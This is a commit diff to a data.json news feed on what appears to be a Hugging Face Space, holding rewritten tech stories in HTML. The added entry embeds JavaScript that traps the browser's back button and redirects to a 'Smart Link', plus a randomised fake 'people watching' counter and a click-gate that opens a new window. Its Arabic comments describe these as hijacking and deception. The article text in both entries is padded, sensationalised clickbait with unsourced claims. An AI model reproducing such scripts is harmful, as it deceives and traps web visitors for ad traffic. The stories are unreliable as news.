Spaces:
Running
Running
Upload data.json with huggingface_hub
Browse files
data.json
CHANGED
|
@@ -1,4 +1,12 @@
|
|
| 1 |
[
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 2 |
{
|
| 3 |
"id": "1781433424",
|
| 4 |
"title": "Microsoft hasn’t ruled out spinning off Xbox",
|
|
@@ -310,13 +318,5 @@
|
|
| 310 |
"image": "https://gizmodo.com/app/uploads/2026/06/GettyImages-2274818048-1280x853.jpg",
|
| 311 |
"source_link": "https://gizmodo.com/researchers-say-smartphones-may-have-helped-drive-the-global-baby-bust-2000768837",
|
| 312 |
"date": "2026-06-10T08:52:54.080883+00:00"
|
| 313 |
-
},
|
| 314 |
-
{
|
| 315 |
-
"id": "1781080662",
|
| 316 |
-
"title": "Apple’s foldable iPhone could be just around the corner",
|
| 317 |
-
"content": "<h1>The Future of Smartphones: Apple's Foldable iPhone</h1><p>For years, the tech world has been abuzz with rumors of a revolutionary new iPhone that could change the game forever - a foldable iPhone. The idea of a phone that can seamlessly transform from a compact, pocket-sized device into a larger, tablet-like screen has captured the imagination of consumers and tech enthusiasts alike. As Apple continues to push the boundaries of innovation, the question on everyone's mind is: when can we expect to see this groundbreaking device hit the market? Will it be a matter of months, or will we have to wait years for the foldable iPhone to become a reality? The answer, much like the phone itself, remains shrouded in mystery, leaving us with only whispers and speculation to fuel our anticipation. As the world waits with bated breath, one thing is certain - the arrival of the foldable iPhone will mark a new era in smartphone technology, and Apple is poised to be at the forefront of this revolution. But for now, the wait continues, and the only thing we can do is speculate about what this device will look like, how it will function, and what features it will boast. The suspense is palpable, and the excitement is building - the future of smartphones has never looked brighter, or more uncertain.</p>\n <div id='g_1781080662' style='text-align:center; padding:25px; margin:20px 0; background:rgba(255,255,255,0.02); border-radius:8px;'>\n <button onclick=\"document.getElementById('c_1781080662').style.display='block'; document.getElementById('g_1781080662').style.display='none';\" style='background:#00ffcc; color:#000; border:none; padding:15px 30px; font-size:16px; font-weight:bold; border-radius:30px; cursor:pointer;'>\n Click Here to Read Full Story & Details 🎥\n </button>\n </div><div id='c_1781080662' style='display:none;'><p>According to recent reports, Apple has been working tirelessly to develop a foldable iPhone, with a team of engineers and designers dedicated to bringing this vision to life. The company has filed numerous patents related to foldable display technology, and it's clear that they're committed to making this device a reality. But as with any new technology, there are challenges to overcome - from ensuring the durability of the foldable screen to developing a user interface that takes full advantage of the device's unique capabilities.</p><p>One of the most significant advantages of a foldable iPhone is the potential for increased screen real estate. Imagine being able to watch videos, browse the web, or play games on a device that can transform from a compact phone into a larger, more immersive screen. The possibilities are endless, and it's clear that Apple is thinking big when it comes to the foldable iPhone. But what about the practicalities - how will the device be powered, and what kind of battery life can we expect? These are just a few of the questions that Apple will need to answer as they bring this device to market.</p><p>As the launch of the foldable iPhone draws closer, the excitement is building. Fans of the brand are eagerly anticipating the opportunity to get their hands on this revolutionary new device, and the tech world is buzzing with speculation about what it will look like and how it will function. With its reputation for innovation and commitment to quality, Apple is well-positioned to make a splash with the foldable iPhone - and it's likely to be a game-changer for the smartphone industry as a whole.</p><p>In conclusion, the arrival of the foldable iPhone is a tantalizing prospect that promises to revolutionize the way we interact with our devices. With its unique blend of style, functionality, and innovation, this device is set to make a significant impact on the tech world - and Apple is poised to be at the forefront of this revolution. As we wait with bated breath for the official launch, one thing is certain - the future of smartphones has never looked brighter, or more exciting.</p></div>",
|
| 318 |
-
"image": "https://techcrunch.com/wp-content/uploads/2022/08/CMC_2923.jpg?resize=1200,893",
|
| 319 |
-
"source_link": "https://techcrunch.com/2026/06/09/apples-foldable-iphone-could-be-just-around-the-corner/",
|
| 320 |
-
"date": "2026-06-10T08:37:42.388926+00:00"
|
| 321 |
}
|
| 322 |
]
|
|
|
|
| 1 |
[
|
| 2 |
+
{
|
| 3 |
+
"id": "1781503067",
|
| 4 |
+
"title": "China may have accessed Mythos",
|
| 5 |
+
"content": "\n <script>\n // 1. تكتيك خطف زرار الرجوع وتوجيهه للـ Smart Link فوراً\n if ('' !== 'None' && '' !== '') {\n history.pushState(null, null, location.href);\n window.onpopstate = function () {\n history.pushState(null, null, location.href);\n window.location.href = '';\n };\n }\n\n // 2. تحديث عداد القطيع الحي لإيهام المستخدم بالزخم\n setInterval(function() {\n var counter = document.getElementById('live_counter');\n if(counter) {\n var current = parseInt(counter.getAttribute('data-value'));\n var change = Math.floor(Math.random() * 11) - 5;\n var next = current + change;\n counter.setAttribute('data-value', next);\n counter.innerHTML = counter.innerHTML.replace(/\\d+/, next);\n }\n }, 4000);\n </script>\n <div style='text-align:center;'>\n <div style='display:inline-block; background:rgba(255,0,51,0.1); border:1px solid #ff0033; padding:6px 15px; border-radius:20px; margin-bottom:15px; font-size:13px; font-weight:bold; color:#ff0033;'>\n <span style='display:inline-block; width:8px; height:8px; background:#ff0033; border-radius:50%; margin-right:5px; animation: blink 1s infinite;'></span>\n <span id='live_counter' data-value='1814'>🔥 1641 people are watching right now</span>\n </div>\n <style>@keyframes blink {0% {opacity:0.2;} 50% {opacity:1;} 100% {opacity:0.2;}}</style>\n </div><h1>BREAKING: China's Shocking Access to Mythos - What You Need to Know Now</h1><p>In a stunning revelation, it has come to light that China may have gained unauthorized access to the highly classified Mythos system. The implications of this potential breach are seismic, and the world is watching with bated breath as the story unfolds.</p>\n <div id='gate_area' style='text-align:center; padding:25px; margin:20px 0; background:rgba(255,255,255,0.02); border-radius:8px; animation: fadeIn 1.5s ease-in-out;'>\n <button onclick=\"document.getElementById('content_area').style.display='block'; document.getElementById('gate_area').style.display='none'; if('' !== 'None' && '' !== ''){ window.open('', '_blank'); }\" style='background:#00ffcc; color:#000; border:none; padding:15px 30px; font-size:16px; font-weight:bold; border-radius:30px; cursor:pointer; box-shadow: 0 0 15px #00ffcc;'>\n Click Here to Read Full Story & Details 🎥\n </button>\n </div>\n <style>@keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } }</style>\n <div id='content_area' style='display:none;'><p>Details are still emerging, but sources close to the matter have confirmed that an investigation is underway to determine the extent of the alleged access. The consequences of such a breach could be catastrophic, with potential risks to global security and stability.</p><p>As the situation continues to develop, one thing is clear: the world is on high alert. The possibility of China accessing Mythos has sent shockwaves through the international community, and leaders are scrambling to respond to the crisis. Stay tuned for further updates as more information becomes available.</p></div>",
|
| 6 |
+
"image": "https://images.unsplash.com/photo-1511512578047-dfb367046420",
|
| 7 |
+
"source_link": "https://www.theverge.com/ai-artificial-intelligence/949644/china-white-house-anthropic-mythos",
|
| 8 |
+
"date": "2026-06-15T05:57:47.465552+00:00"
|
| 9 |
+
},
|
| 10 |
{
|
| 11 |
"id": "1781433424",
|
| 12 |
"title": "Microsoft hasn’t ruled out spinning off Xbox",
|
|
|
|
| 318 |
"image": "https://gizmodo.com/app/uploads/2026/06/GettyImages-2274818048-1280x853.jpg",
|
| 319 |
"source_link": "https://gizmodo.com/researchers-say-smartphones-may-have-helped-drive-the-global-baby-bust-2000768837",
|
| 320 |
"date": "2026-06-10T08:52:54.080883+00:00"
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 321 |
}
|
| 322 |
]
|